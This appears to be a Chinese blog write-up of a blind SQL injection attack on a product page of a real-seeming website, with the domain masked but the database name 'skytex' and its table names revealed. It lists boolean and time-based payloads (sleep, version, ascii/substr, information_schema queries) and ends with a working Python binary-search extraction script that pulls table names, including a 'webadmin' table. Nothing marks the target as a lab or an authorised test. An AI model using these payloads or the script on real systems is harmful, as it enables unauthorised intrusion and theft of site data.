某网站sql盲注

http://www.xxxxxx.com/products.php?id=113

http://www.xxxxxx.com/products.php?id=114-1 两页面显示相同

尝试闭合

http://www.xxxxxx.com/products.php?id=113' 页面显示错误

使用 “ ' ) 等闭合外加注释也显示错误

测试发现不需要进行闭合

http://www.xxxxxx.com/products.php?id=113%20and%201=1 页面正常

http://www.xxxxxx.com/products.php?id=113%20and%201=2 页面错误

使用order by 测字段数

http://www.xxxxxx.com/products.php?id=113 order by 2 发现无回显

推测是盲注

http://www.xxxxxx.com/products.php?id=113%20and%20sleep(3) 会延时

判断数据库版本

http://www.xxxxxx.com/products.php?id=113%20and%20left(version(),6)=%275.5.46%27 得到 为mysql 5.5.46

判断当前数据库长度

http://www.xxxxxx.com/products.php?id=113%20and%20length(database())>5

http://www.xxxxxx.com/products.php?id=113%20and%20length(database())=6

得到长度为6位

猜解数据库

http://www.xxxxxx.com/products.php?id=113%20and%20ascii(substr(database(),1,1))>114

http://www.xxxxxx.com/products.php?id=113%20and%20ascii(substr(database(),1,1))=115

判断出第一位为 115 对应 s

得到数据库名为 skytex

判断表长度

http://www.xxxxxx.com/products.php?id=113 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=5

得到第一张表长度为5

http://www.xxxxxx.com/products.php?id=113 and length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=10

第n张表

length((select table_name from information_schema.tables where table_schema=database() limit {n},1))>{m}

跑表内容

http://www.xxxxxx.com/products.php?id=113 and ord(mid((select table_name from information_schema.tables where table_schema='skytex' limit 0,1),1,1))=97

第一张表为 atype

第二张表为 atypeainfo

... ...

import requests
import time

url = 'http://www.xxxxxx.com/products.php/'
data = ''

payloads = list(range(48,58))+list(range(65,91))+list(range(97,123))   #大/小写字母和数字的ascii，len=62

# 数据库长度位6
# 第一张表长 5 第二张表长 10 第三张表为 8 第四张表 9
for i in range(1,10):  #改变这里长度
    low = 0
    high = 61
    while high - low > 1:
        mid = (high + low) // 2
        m = payloads[mid]  # 二分法判断

        # payload = f"?id=113 and ascii(substr(database(),{i},1))>{m}"  #数据库为 skytex

        # payload = f"?id=113 and ord(mid((select table_name from information_schema.tables where table_schema='skytex' limit 0,1),{i},1))>{m}"    #第一张表 atype
        # payload = f"?id=113 and ord(mid((select table_name from information_schema.tables where table_schema='skytex' limit 1,1),{i},1))>{m}"    #第二张表 atypeinfo
        # payload = f"?id=113 and ord(mid((select table_name from information_schema.tables where table_schema='skytex' limit 2,1),{i},1))>{m}"    #第三张表 feedback
        payload = f"?id=113 and ord(mid((select table_name from information_schema.tables where table_schema='skytex' limit 3,1),{i},1))>{m}"    #第四张表 webadmin

        r = requests.get(url+payload)
        if 'PZ-CAP' in r.text:
            low = mid
        else:
            high = mid
    data += chr(payloads[high])
    print(data)